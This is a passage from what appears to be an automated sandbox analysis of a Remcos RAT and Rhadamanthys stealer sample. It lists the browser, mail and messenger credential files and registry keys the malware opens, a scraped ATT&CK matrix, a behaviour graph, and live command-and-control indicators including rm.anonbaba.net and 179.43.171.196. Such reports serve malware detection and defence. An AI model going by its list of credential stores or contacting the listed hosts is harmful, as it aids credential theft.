                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cache2
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\settings\main\ms-language-packs\browser
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\settings\main\ms-language-packs\browser\newtab
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\settings\main\ms-language-packs
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Maskable
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Maskable
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\settings\main
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome
                  Source: C:\Users\user\task.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\startupCache
                  Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons Monochrome
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Users\user\task.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                  Yara detected WebBrowserPassView password recovery tool
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 6316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 716, type: MEMORYSTR
                  Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                  Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\JSDNGYCOWY
                  Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\KATAXZVCPS
                  Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\NHPKIZUUSG
                  Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                  Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2968, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Users\user\task.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-RNN6CMJump to behavior
                  Source: C:\Users\user\task.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-RNN6CM
                  Yara detected RHADAMANTHYS Stealer
                  Source: Yara matchFile source: 0000001F.00000003.1672134784.0000000003480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000003.1674900501.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000019.00000003.1662192131.0000000000580000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000002.1765068419.0000000003490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 22.2.task.exe.255066b.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.task.exe.255066b.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.task.exe.6066b.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 22.2.task.exe.60000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.task.exe.120000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.task.exe.6066b.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.4482520616.0000000000060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.4490232230.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.4483930249.0000000000176000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 6316, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: task.exe PID: 1272, type: MEMORYSTR
                  Source: C:\Users\user\task.exeCode function: cmd.exe22_2_000657D6
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8DF8E0 bind,listen,WSAGetLastError,closesocket,8_2_6C8DF8E0
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE7F8E0 bind,listen,WSAGetLastError,closesocket,22_2_6FE7F8E0

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		1
                  Replication Through Removable Media                  		11
                  Windows Management Instrumentation                  		1
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Native API                  		1
                  DLL Side-Loading                  		1
                  Extra Window Memory Injection                  		1
                  Deobfuscate/Decode Files or Information                  		131
                  Input Capture                  		11
                  Peripheral Device Discovery                  		Remote Desktop Protocol11
                  Data from Local System                  		22
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts1
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Access Token Manipulation                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		1
                  Account Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution                  		1
                  Registry Run Keys / Startup Folder                  		1
                  Windows Service                  		2
                  Software Packing                  		3
                  Credentials In Files                  		1
                  System Service Discovery                  		Distributed Component Object Model131
                  Input Capture                  		1
                  Remote Access Software                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Services File Permissions Weakness                  		512
                  Process Injection                  		1
                  DLL Side-Loading                  		LSA Secrets15
                  File and Directory Discovery                  		SSH3
                  Clipboard Data                  		2
                  Non-Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Registry Run Keys / Startup Folder                  		1
                  File Deletion                  		Cached Domain Credentials1310
                  System Information Discovery                  		VNCGUI Input Capture13
                  Application Layer Protocol                  		Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                  Services File Permissions Weakness                  		1
                  Extra Window Memory Injection                  		DCSync351
                  Security Software Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
                  Masquerading                  		Proc Filesystem51
                  Virtualization/Sandbox Evasion                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
                  Virtualization/Sandbox Evasion                  		/etc/passwd and /etc/shadow4
                  Process Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Access Token Manipulation                  		Network Sniffing1
                  Application Window Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd512
                  Process Injection                  		Input Capture1
                  System Owner/User Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Services File Permissions Weakness                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560070 Sample: wE1inOhJA5.msi Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 104 rm.anonbaba.net 2->104 106 ts1.aco.net 2->106 108 6 other IPs or domains 2->108 130 Suricata IDS alerts for network traffic 2->130 132 Found malware configuration 2->132 134 Malicious sample detected (through community Yara rule) 2->134 136 11 other signatures 2->136 12 cmd.exe 1 2->12         started        14 msiexec.exe 3 14 2->14         started        17 cmd.exe 2->17         started        19 msiexec.exe 5 2->19         started        signatures3 process4 file5 21 task.exe 2 13 12->21         started        25 conhost.exe 12->25         started        102 C:\Windows\Installer\MSI509A.tmp, PE32 14->102 dropped 27 msiexec.exe 5 14->27         started        29 task.exe 17->29         started        31 conhost.exe 17->31         started        process6 dnsIp7 124 rm.anonbaba.net 179.43.171.197, 3393, 49713, 49714 PLI-ASCH Panama 21->124 126 geoplugin.net 178.237.33.50, 49717, 80 ATOM86-ASATOM86NL Netherlands 21->126 152 Detected unpacking (changes PE section rights) 21->152 154 Detected Remcos RAT 21->154 156 Contains functionalty to change the wallpaper 21->156 158 9 other signatures 21->158 33 task.exe 21->33         started        35 task.exe 21->35         started        38 task.exe 21->38         started        40 task.exe 2 21->40         started        42 expand.exe 9 27->42         started        45 task.exe 1 5 27->45         started        47 cmd.exe 1 27->47         started        49 2 other processes 27->49 signatures8 process9 file10 51 svchost.exe 33->51         started        138 Tries to steal Instant Messenger accounts or passwords 35->138 140 Tries to steal Mail credentials (via file / registry access) 35->140 142 Tries to harvest and steal browser information (history, passwords, etc) 38->142 88 C:\Users\...\your_package_name.dll (copy), PE32 42->88 dropped 90 C:\Users\user\AppData\...\task.exe (copy), PE32 42->90 dropped 92 C:\Users\user\AppData\...\g2m.dll (copy), PE32 42->92 dropped 100 4 other malicious files 42->100 dropped 55 conhost.exe 42->55         started        94 C:\Users\user\task.exe, PE32 45->94 dropped 96 C:\Users\user\g2m.dll, PE32 45->96 dropped 98 C:\Users\user\apps.bat, DOS 45->98 dropped 144 Drops PE files to the user root directory 45->144 57 cmd.exe 1 1 45->57         started        59 WerFault.exe 19 16 45->59         started        61 conhost.exe 47->61         started        63 conhost.exe 49->63         started        65 conhost.exe 49->65         started        signatures11 process12 dnsIp13 110 179.43.171.196, 443, 49718, 49733 PLI-ASCH Panama 51->110 146 System process connects to network (likely due to code injection or exploit) 51->146 148 Switches to a custom stack to bypass stack traces 51->148 67 svchost.exe 51->67         started        71 conhost.exe 57->71         started        signatures14 process15 dnsIp16 112 time-a-g.nist.gov 129.6.15.28, 123, 49952 US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUS United States 67->112 114 ntp1.net.berkeley.edu 169.229.128.134, 123, 49952 UCBUS United States 67->114 116 3 other IPs or domains 67->116 150 Tries to harvest and steal browser information (history, passwords, etc) 67->150 73 wmplayer.exe 67->73         started        76 chrome.exe 67->76         started        79 msedge.exe 67->79         started        signatures17 process18 dnsIp19 160 Writes to foreign memory regions 73->160 162 Allocates memory in foreign processes 73->162 81 dllhost.exe 73->81         started        128 239.255.255.250 unknown Reserved 76->128 83 chrome.exe 76->83         started        86 msedge.exe 79->86         started        signatures20 process21 dnsIp22 118 127.0.0.1 unknown unknown 83->118 120 162.159.61.3, 443, 49737 CLOUDFLARENETUS United States 86->120 122 chrome.cloudflare-dns.com 172.64.41.3, 443, 49736 CLOUDFLARENETUS United States 86->122

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  wE1inOhJA5.msi45%ReversingLabsWin32.Backdoor.Remcos

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\bce5c9c7fb0eb5498f5eb0ff4df1bd89.tmp100%AviraBAT/Runner.wekvp
                  C:\Users\user\apps.bat100%AviraBAT/Runner.wekvp
                  C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\67a1ae3c4a36f34f89fd14e4fff5e74c.tmp0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\75aedfde5bde214c9f1dda9d9e9a381f.tmp29%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\87377860be1e204a95d069480a67ac12.tmp67%ReversingLabsWin32.Adware.RedCap
                  C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\g2m.dll (copy)29%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe (copy)0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\your_package_name.dll (copy)67%ReversingLabsWin32.Adware.RedCap
                  C:\Users\user\g2m.dll29%ReversingLabs
                  C:\Users\user\task.exe0%ReversingLabs
                  C:\Windows\Installer\MSI509A.tmp0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  rm.anonbaba.net100%Avira URL Cloudmalware
                  https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txna0%Avira URL Cloudsafe
                  https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnas0%Avira URL Cloudsafe
                  http://127.00%Avira URL Cloudsafe
                  https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnaymb0%Avira URL Cloudsafe
                  https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnakernelbasentdllkernel32GetProcessMitigati0%Avira URL Cloudsafe
                  https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnax0%Avira URL Cloudsafe
                  http://www.imvu.coma0%Avira URL Cloudsafe
                  http://127.01:0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ntp.nict.jp
                  		61.205.120.130
                  		truefalse
                    		high
                    chrome.cloudflare-dns.com
                    		172.64.41.3
                    		truefalse
                      		high
                      rm.anonbaba.net
                      		179.43.171.197
                      		truetrue
                        		unknown
                        geoplugin.net
                        		178.237.33.50
                        		truefalse
                          		high
                          ntp1.net.berkeley.edu
                          		169.229.128.134
                          		truefalse
                            		unknown
                            ntp.time.in.ua
                            		62.149.0.30
                            		truefalse
                              		high
                              time-a-g.nist.gov
                              		129.6.15.28
                              		truefalse
                                		high
                                ts1.aco.net
                                		193.171.23.163
                                		truefalse
                                  		unknown
                                  time.windows.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnatrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    rm.anonbaba.nettrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://geoplugin.net/json.gpfalse
                                      		high

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http://geoplugin.net/json.gp$task.exe, 00000016.00000003.1640544536.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1650331166.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1647273159.0000000000871000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648907336.0000000000875000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1642454762.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648293959.0000000000871000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1642187022.0000000000874000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1641987804.0000000000870000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648139673.000000000086D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649617657.0000000000874000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1638859407.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1652161168.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1641701441.0000000000875000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1651088954.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1640814728.000000000086C000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1646658676.000000000086D000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1640250134.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1646278220.0000000000869000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1645514022.0000000000879000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1648455258.0000000000875000.00000004.00000020.00020000.00000000.sdmp, task.exe, 00000016.00000003.1649057788.0000000000869000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://duckduckgo.com/chrome_newtabsvchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnassvchost.exe, 00000020.00000002.2171115892.000001BE8295E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.imvu.comrtask.exe, 00000016.00000002.4497866772.00000000041C0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 0000001B.00000002.1655472642.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=svchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icosvchost.exe, 00000020.00000003.1876727727.000001BE8562A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1877374560.000001BE8562A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://179.43.171.196:5982/c329ffe03228fab8/o0tr85tn.5txnaxsvchost.exe, 0000001F.00000002.1764466512.0000000000C7C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
